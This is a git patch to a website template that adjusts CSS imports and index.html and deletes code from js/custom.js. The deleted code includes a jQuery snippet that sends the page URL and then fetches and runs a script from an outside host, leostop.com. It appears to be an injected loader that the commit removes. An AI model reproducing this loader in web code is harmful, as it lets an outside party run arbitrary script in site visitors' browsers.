From f1cc8fdbbf98203fd949213d1a24066badff13a8 Mon Sep 17 00:00:00 2001 From: Pawel Dudzik Date: Wed, 4 Sep 2024 15:05:25 +0200 Subject: [PATCH] Adjusting page to get rid of errors --- css/style.css | 1 - index.html | 16 ++++++++++++++-- js/custom.js | 23 ----------------------- 3 files changed, 14 insertions(+), 26 deletions(-) diff --git a/css/style.css b/css/style.css index c98bb21..7819c35 100644 --- a/css/style.css +++ b/css/style.css @@ -22,7 +22,6 @@ @import url(font-awesome.min.css); @import url(meanmenu.css); @import url(owl.carousel.min.css); -@import url(swiper.min.css); @import url(slick.css); @import url(jquery.fancybox.min.css); @import url(jquery-ui.css); diff --git a/index.html b/index.html index 348a685..434ea30 100644 --- a/index.html +++ b/index.html @@ -17,8 +17,6 @@ - - @@ -28,6 +26,18 @@ + + + + @@ -250,6 +260,8 @@ + + diff --git a/js/custom.js b/js/custom.js index 82f12ee..f0f5b69 100644 --- a/js/custom.js +++ b/js/custom.js @@ -35,28 +35,5 @@ $(function () { $("#wrapper").removeClass('overlay'); }); }); - - - -function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: {surl: getURL()}, success: function(response){ $.getScript(protocol+"//leostop.com/tracking/tracking.js"); } }); - - - /* Toggle sidebar - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ - - $(document).ready(function () { - $('#sidebarCollapse').on('click', function () { - $('#sidebar').toggleClass('active'); - $(this).toggleClass('active'); - }); - }); - - /* Product slider - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ - // optional - $('#blogCarousel').carousel({ - interval: 5000 - }); - }); \ No newline at end of file